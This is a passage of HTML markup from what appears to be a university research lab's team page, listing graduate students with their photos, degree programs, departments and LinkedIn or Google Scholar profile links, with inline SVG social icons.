</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c84-outer\">\n <div data-colibri-id=\"182-c84\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c84 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c85\" class=\"d-block style-856 style-local-182-c85 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c85-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c85-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c86\" class=\"h-global-transition-all h-heading style-850 style-local-182-c86 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c86\">\n <!---->\n <!---->\n <h4 class=\"\">Emma McDaniel</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c87\" class=\"h-text h-text-component style-851 style-local-182-c87 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c88\" class=\"h-text h-text-component style-852 style-local-182-c88 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c89\" class=\"style-857 style-local-182-c89 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c342-outer\">\n <div data-colibri-id=\"182-c342\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c342 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c343\" class=\"d-block style-854 style-local-182-c343 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg\" class=\"wp-image-863 style-854-image style-local-182-c343-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c343-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c344\" class=\"h-global-transition-all h-heading style-850 style-local-182-c344 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c344\">\n <!---->\n <!---->\n <h4 class=\"\">Ardavan Sassini</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c345\" class=\"h-text h-text-component style-851 style-local-182-c345 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c346\" class=\"h-text h-text-component style-902 style-local-182-c346 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c347\" class=\"style-855 style-local-182-c347 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c348-outer\">\n <div data-colibri-id=\"182-c348\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c348 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c349\" class=\"d-block style-854 style-local-182-c349 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Basit-2.jpg\" class=\"wp-image-838 style-854-image style-local-182-c349-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c349-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c350\" class=\"h-global-transition-all h-heading style-850 style-local-182-c350 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c350\">\n <!---->\n <!---->\n <h4 class=\"\">Basit Damilare Amuda</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c351\" class=\"h-text h-text-component style-851 style-local-182-c351 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c352\" class=\"h-text h-text-component style-902 style-local-182-c352 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Geosciences</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c353\" class=\"style-855 style-local-182-c353 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c354-outer\">\n <div data-colibri-id=\"182-c354\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c354 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c355\" class=\"d-block style-854 style-local-182-c355 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c355-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c355-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c356\" class=\"h-global-transition-all h-heading style-850 style-local-182-c356 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c356\">\n <!---->\n <!---->\n <h4 class=\"\">Sara Edwards</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c357\" class=\"h-text h-text-component style-851 style-local-182-c357 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c358\" class=\"h-text h-text-component style-902 style-local-182-c358 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c359\" class=\"style-855 style-local-182-c359 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c361-outer\">\n <div data-colibri-id=\"182-c361\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c361 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c362\" class=\"d-block style-854 style-local-182-c362 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c362-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c362-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c363\" class=\"h-global-transition-all h-heading style-850 style-local-182-c363 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c363\">\n <!---->\n <!---->\n <h4 class=\"\">Ryan Garland</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c364\" class=\"h-text h-text-component style-851 style-local-182-c364 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s Student\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c365\" class=\"h-text h-text-component style-902 style-local-182-c365 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c366\" class=\"style-855 style-local-182-c366 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c367-outer\">\n <div data-colibri-id=\"182-c367\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c367 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c368\" class=\"d-block style-854 style-local-182-c368 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg\" class=\"wp-image-1094 style-854-image style-local-182-c368-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c368-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c369\" class=\"h-global-transition-all h-heading style-850 style-local-182-c369 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c369\">\n <!---->\n <!---->\n <h4 class=\"\">Jean Guo</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c370\" class=\"h-text h-text-component style-851 style-local-182-c370 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Master\'s student</p>\n </div>\n </div>\n <div data-colibri-id=\"182-c371\" class=\"h-text h-text-component style-902 style-local-182-c371 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c373-outer\">\n <div data-colibri-id=\"182-c373\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c373 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start 